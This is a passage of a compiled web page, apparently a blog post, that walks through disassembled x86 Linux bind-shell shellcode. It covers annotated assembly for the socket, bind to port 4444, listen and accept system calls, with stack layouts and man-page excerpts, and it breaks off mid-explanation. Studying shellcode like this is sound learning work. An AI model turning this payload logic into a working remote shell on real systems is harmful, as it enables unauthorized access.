{\n \"className\": \"token operator\"\n }), \"*\"), \"args\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\")))), mdx(\"p\", null, \"And argument description:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n parentName: \"blockquote\"\n }, mdx(\"strong\", {\n parentName: \"p\"\n }, \"call\"), \" determines which socket function to invoke. \", mdx(\"strong\", {\n parentName: \"p\"\n }, \"args\"), \" points to a block containing the actual arguments, which are passed through to the appropriate call.\")), mdx(\"p\", null, \"Possible call values are defined as \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/bionic/man2/socketcall.2.html\"\n }), \"follow\"), \":\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"c\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_SOCKET 1 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_socket(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_BIND 2 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_bind(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_CONNECT 3 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_connect(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_LISTEN 4 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_listen(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_ACCEPT 5 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_accept(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_GETSOCKNAME 6 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_getsockname(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_GETPEERNAME 7 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_getpeername(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_SOCKETPAIR 8 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_socketpair(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_SEND 9 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_send(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_RECV 10 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_recv(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_SENDTO 11 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_sendto(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_RECVFROM 12 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_recvfrom(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_SHUTDOWN 13 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_shutdown(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_SETSOCKOPT 14 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_setsockopt(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_GETSOCKOPT 15 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_getsockopt(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_SENDMSG 16 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_sendmsg(2) */\"), \"\\n\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"define\"), \" SYS_RECVMSG 17 \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* sys_recvmsg(2) */\")))), mdx(\"p\", null, \"Therefore, what this snippet actually does is invoking sub-function \", mdx(\"strong\", {\n parentName: \"p\"\n }, mdx(\"a\", _extends({\n parentName: \"strong\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/socket.2.html\"\n }), \"socket\")), \" function, with actual arguments consist of \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"0x2\"), \", \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"0x1\"), \" which stands for \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"AF_INET\"), \" and \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"SOCK_STREAM\"), \". After execution, this syscall return value is \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"0x3\"), \" a file descriptor, and stored in register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EAX\"), \".\"), mdx(\"p\", null, \"Synopsis of function socket:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"c\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-c\"\n }), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"include\"), \" \", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token string\"\n }), \"\"), \" \"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token comment\"\n }), \"/* See NOTES */\"), \"\\n \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token macro property\"\n }), \"#\", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token directive keyword\"\n }), \"include\"), \" \", mdx(\"span\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"token string\"\n }), \"\")), \"\\n\\n \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"socket\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" domain\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" type\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" protocol\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\")))), mdx(\"p\", null, \"Possible return value:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"On success, a file descriptor for the new socket is returned. On error, -1 is returned, and errno is set appropriately.\")), mdx(\"h3\", null, \"Bind() system call\"), mdx(\"p\", null, \"Assembly snippet 2:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"assembly\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-assembly\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-assembly\"\n }), \"0x0804a04f <+15>: pop ebx ; ebx now holds 0x2\\n0x0804a050 <+16>: pop esi ; esi now holds 0x1\\n0x0804a051 <+17>: push edx ; edx holds 0x0, null terminate following content\\n0x0804a052 <+18>: push 0x5c110002 ; 0x5c11 stand for 4444, 0x0002 stand for family AF_INET in little endian format\\n0x0804a057 <+23>: push 0x10\\n0x0804a059 <+25>: push ecx ; push previous stack point (now pointing to 0x5c110002) into stak\\n0x0804a05a <+26>: push eax ; push previous syscall return value into stack to save file descriptor\\n0x0804a05b <+27>: mov ecx,esp ; save current stack point to ecx\\n0x0804a05d <+29>: push 0x66 ; push 0x66 (102) into stack\\n0x0804a05f <+31>: pop eax ; pop 0x66 (102) out of stack and store it in register eax\\n0x0804a060 <+32>: int 0x80\"))), mdx(\"p\", null, \"Again, since \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EBX\"), \" holds \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"0x2\"), \" the actual function got invoked is sub-function \", mdx(\"strong\", {\n parentName: \"p\"\n }, mdx(\"a\", _extends({\n parentName: \"strong\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/bind.2.html\"\n }), \"bind\")), \", and \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"ECX\"), \" holds the address of the other arguments.\"), mdx(\"p\", null, \"Synopsis from man page:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"c\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-c\"\n }), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"bind\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" sockfd\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"const\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"struct\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token class-name\"\n }), \"sockaddr\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"*\"), \"addr\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \"\\n socklen_t addrlen\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\")))), mdx(\"p\", null, \"Possible return value:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"On success, zero is returned. On error, -1 is returned, and errno is\\nset appropriately.\")), mdx(\"p\", null, \"Stack layout:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"assembly\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-assembly\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-assembly\"\n }), \" Address Stack\\n +------------+\\n .... | .... |\\n +------------+\\nesp (ecx) \\u2014\\u25B8 0xbfffef54 | 0x00000003 | \\u25C2\\u2014 socket file descriptor [0]\\n +------------+\\n 0xbfffef58 | 0xbfffef60 | \\u25C2\\u2014 memory address of bind address (0x5c110002) [1] \\u2014\\u25B8 [3]\\n +------------+\\n 0xbfffef5c | 0x00000010 | \\u25C2\\u2014 length of address [2]\\n +------------+\\n 0xbfffef60 | 0x5c110002 | \\u25C2\\u2014 reference by 0xbfffef58 [3]\\n +------------+\\n 0xbfffef64 | 0x00000000 |\\n +------------+\\n .... | .... |\\n +------------+\"))), mdx(\"p\", null, \"Before calling syscall:\"), mdx(\"p\", null, mdx(\"span\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"gatsby-resp-image-wrapper\",\n \"style\": {\n \"position\": \"relative\",\n \"display\": \"block\",\n \"marginLeft\": \"auto\",\n \"marginRight\": \"auto\",\n \"maxWidth\": \"590px\"\n }\n }), \"\\n \", mdx(\"a\", _extends({\n parentName: \"span\"\n }, {\n \"className\": \"gatsby-resp-image-link\",\n \"href\": \"/static/ba4366106ff8411971014c0ff5c55c1b/d9199/2020-06-17_10-46.png\",\n \"style\": {\n \"display\": \"block\"\n },\n \"target\": \"_blank\",\n \"rel\": \"noopener\"\n }), \"\\n \", mdx(\"span\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-background-image\",\n \"style\": {\n \"paddingBottom\": \"70.94594594594594%\",\n \"position\": \"relative\",\n \"bottom\": \"0\",\n \"left\": \"0\",\n \"backgroundImage\": \"url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAA7EAAAOxAGVKw4bAAADI0lEQVQ4y4WTSU/kVhSFaxU8lWsiBdTsucou289zjVRBNxBCgVrddKJsIzb9J4gXWRAvssifbSVPvBMZWqRRL7L4dJ50patzz323sjLT460xe1h2lHvSdvOg5eTHDT0Pm3a+0bL81FrkW32Wu7L+gldqzczdupW7spG7svabK+u/m+LAr5xYy4cP5BKbnoekbiNteEjkCcKqjaQ+RVp7JpLGCCULoThGIJiIZAdRw0Mk20+1uGrD4oefKmfT4/tb/w0u2trn45pKl7UxzXiFZpxCU06hsaxTIimUSGOayA7Nmg5dHRIaVU3qcyolvPYP4bW/Ca/B3Ov9WrmKz/Ofg1PsOh16caCyswOfzSWdpbzCZqLBEtlicd1icW3CQsliUdViSX3CAtFgPq8ywmslj4Gglw3vKkttll/pc+y6Gr3sOezNAcGsPUbYGiNuBMhaHtbdGPM2AZFM+IIBT9DhSxZIzQGRLEZE8zGQLJj84K5i7Q3yD8EOt+k7eu3+wDb9DItuF1kvRHgQwRV0TPdUuJwGIuhfYYCIZvlmRNAfA8GAyfXvKt6+mr+fbfF+saW7cMm2owCLTgerbor14QIpP8Jc0BCLBnxeA/mC/x+vR55IwzySDVz7J/TCdNmsNcCs5SKqWiCcioBTEPLqS5PSnf+VU//FoQ6T691VbFHJfzQ2uI0v6c7estWhh2x/hOh7F3E7QticIqrZiBrT5wz/z6HFD/OP8RV+ynb0xj9n28ECyX4X6VGMxdEaZdikHLekzO1Vhsa3GS5HcX4zPcOZvqInw4ydDg226arsuB+zrDVmgaSxqGazpOmwoGoxXzTLrbKn7coT9s2Wd9Hb+1/mN0gbzudQ0uitd0Tf2X167SzpzonpujOlSXNKF22fBqJBfU6hPq99QX3SVx/7rb16+OhfPp1bJOq4MUa40lSc9xKc1qdYCibmnIaZbCGtG0jqHpKqjag8P9F6VsFELFrlyJ8qazM93WrpX46oPNh8v9gMD4t1v1ssOm4RCMNiutcrPG5QuNKosMVBYYtaYfOjYswPi4mgFJNSucEfY27wp/LdUfIvNopxAT9dZ78AAAAASUVORK5CYII=')\",\n \"backgroundSize\": \"cover\",\n \"display\": \"block\"\n }\n })), \"\\n \", mdx(\"img\", _extends({\n parentName: \"a\"\n }, {\n \"className\": \"gatsby-resp-image-image\",\n \"alt\": \"sys_bind\",\n \"title\": \"sys_bind\",\n \"src\": \"/static/ba4366106ff8411971014c0ff5c55c1b/fcda8/2020-06-17_10-46.png\",\n \"srcSet\": [\"/static/ba4366106ff8411971014c0ff5c55c1b/12f09/2020-06-17_10-46.png 148w\", \"/static/ba4366106ff8411971014c0ff5c55c1b/e4a3f/2020-06-17_10-46.png 295w\", \"/static/ba4366106ff8411971014c0ff5c55c1b/fcda8/2020-06-17_10-46.png 590w\", \"/static/ba4366106ff8411971014c0ff5c55c1b/efc66/2020-06-17_10-46.png 885w\", \"/static/ba4366106ff8411971014c0ff5c55c1b/d9199/2020-06-17_10-46.png 960w\"],\n \"sizes\": \"(max-width: 590px) 100vw, 590px\",\n \"style\": {\n \"width\": \"100%\",\n \"height\": \"100%\",\n \"margin\": \"0\",\n \"verticalAlign\": \"middle\",\n \"position\": \"absolute\",\n \"top\": \"0\",\n \"left\": \"0\"\n },\n \"loading\": \"lazy\"\n })), \"\\n \"), \"\\n \")), mdx(\"p\", null, \"If nothing goes wrong, the content of register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EAX\"), \" will change to 0, indicate zero is returned. Now, socket successfully binds to port 4444, the next step is to set the listener handler to handle incoming connection.\"), mdx(\"h3\", null, \"Listen() system call\"), mdx(\"p\", null, \"Assembly snippet 3:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"assembly\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-assembly\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-assembly\"\n }), \"0x0804a062 <+34>: mov DWORD PTR [ecx+0x4],eax ; eax holds 0x0, set stack address 0xbfffef58 to 0x00000000\\n0x0804a065 <+37>: mov bl,0x4 ; set ebx to 0x4, perpare to invoke SYS_LISTEN(4)\\n0x0804a067 <+39>: mov al,0x66 ; set sys_socketcall number\\n0x0804a069 <+41>: int 0x80 ; system interrupt - calling syscall\"))), mdx(\"p\", null, \"Register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EBX\"), \" set to 4, hence sub-function \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/listen.2.html\"\n }), \"listen\"), \" will be called.\"), mdx(\"p\", null, \"Synopsis of listen function:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"c\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"listen\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" sockfd\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" backlog\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\")))), mdx(\"p\", null, \"Possible return value:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"On success, zero is returned. On error, -1 is returned, and errno is set appropriately.\")), mdx(\"p\", null, \"Description:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"listen() marks the socket referred to by sockfd as a passive socket, that is, as a socket that will be used to accept incoming connection requests using \", mdx(\"strong\", {\n parentName: \"p\"\n }, mdx(\"a\", _extends({\n parentName: \"strong\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/accept.2.html\"\n }), \"accept(2)\")), \".\"), mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"The sockfd argument is a file descriptor that refers to a socket of type \", mdx(\"strong\", {\n parentName: \"p\"\n }, \"SOCK_STREAM\"), \" or \", mdx(\"strong\", {\n parentName: \"p\"\n }, \"SOCK_SEQPACKET\"), \".\"), mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"The backlog argument defines the maximum length to which the queue of pending connections for sockfd may grow. If a connection request arrives when the queue is full, the client may receive an error with an indication of \", mdx(\"strong\", {\n parentName: \"p\"\n }, \"ECONNREFUSED\"), \" or, if the underlying protocol supports retransmission, the request may be ignored so that a later reattempt at connection succeeds.\")), mdx(\"p\", null, \"Stack layout:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"assembly\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-assembly\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-assembly\"\n }), \" Address Stack\\n +------------+\\n .... | .... |\\n +------------+\\nesp (ecx) \\u2014\\u25B8 0xbfffef54 | 0x00000003 | \\u25C2\\u2014 socket file descriptor [0]\\n +------------+\\n[ecx+0x4] \\u2014\\u25B8 0xbfffef58 | 0x00000000 | \\u25C2\\u2014 backlog [1]\\n +------------+\\n 0xbfffef5c | 0x00000010 |\\n +------------+\\n 0xbfffef60 | 0x5c110002 |\\n +------------+\\n 0xbfffef64 | 0x00000000 |\\n +------------+\\n .... | .... |\\n +------------+\"))), mdx(\"h3\", null, \"Accept() systemcall\"), mdx(\"p\", null, \"Assembly snippet 4:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"assembly\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-assembly\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-assembly\"\n }), \"0x0804a06b <+43>: inc ebx ; increment ebx by 1 which end up to 5 which stand for SYS_ACCEPT(5)\\n0x0804a06c <+44>: mov al,0x66 ; again sys_socketcall number\\n0x0804a06e <+46>: int 0x80 ; invoke syscall, waiting for connection\"))), mdx(\"p\", null, \"Register \", mdx(\"code\", _extends({\n parentName: \"p\"\n }, {\n \"className\": \"language-text\"\n }), \"EBX\"), \" increment to 5, therefore, sub-function \", mdx(\"a\", _extends({\n parentName: \"p\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/accept.2.html\"\n }), \"accept\"), \" is called.\"), mdx(\"p\", null, \"Definition of accept function:\"), mdx(\"div\", {\n \"className\": \"gatsby-highlight\",\n \"data-language\": \"c\"\n }, mdx(\"pre\", _extends({\n parentName: \"div\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"code\", _extends({\n parentName: \"pre\"\n }, {\n \"className\": \"language-c\"\n }), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token function\"\n }), \"accept\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \"(\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"int\"), \" sockfd\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token keyword\"\n }), \"struct\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token class-name\"\n }), \"sockaddr\"), \" \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"*\"), \"addr\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \",\"), \" socklen_t \", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token operator\"\n }), \"*\"), \"addrlen\", mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \")\"), mdx(\"span\", _extends({\n parentName: \"code\"\n }, {\n \"className\": \"token punctuation\"\n }), \";\")))), mdx(\"p\", null, \"Possible return value:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"On success, these system calls return a nonnegative integer that is a descriptor for the accepted socket. On error, -1 is returned, and errno is set appropriately.\")), mdx(\"p\", null, \"Description:\"), mdx(\"blockquote\", null, mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"The \", mdx(\"strong\", {\n parentName: \"p\"\n }, mdx(\"a\", _extends({\n parentName: \"strong\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/accept.2.html\"\n }), \"accept()\")), \" system call is used with connection-based socket types (SOCK_STREAM, SOCK_SEQPACKET). It extracts the first connection request on the queue of pending connections for the listening socket, sockfd, creates a new connected socket, and returns a new file descriptor referring to that socket. The newly created socket is not in the listening state. The original socket sockfd is unaffected by this call.\"), mdx(\"p\", {\n parentName: \"blockquote\"\n }, \"The argument sockfd is a socket that has been created with \", mdx(\"strong\", {\n parentName: \"p\"\n }, mdx(\"a\", _extends({\n parentName: \"strong\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/socket.2.html\"\n }), \"socket(2)\")), \", bound to a local address with \", mdx(\"strong\", {\n parentName: \"p\"\n }, mdx(\"a\", _extends({\n parentName: \"strong\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/bind.2.html\"\n }), \"bind(2)\")), \", and is listening for connections after a \", mdx(\"strong\", {\n parentName: \"p\"\n }, mdx(\"a\", _extends({\n parentName: \"strong\"\n }, {\n \"href\": \"https://manpages.ubuntu.com/manpages/xenial/man2/listen.2.html\"\n }), \"listen(2)\")), \".\"), mdx(\"p\", {\n 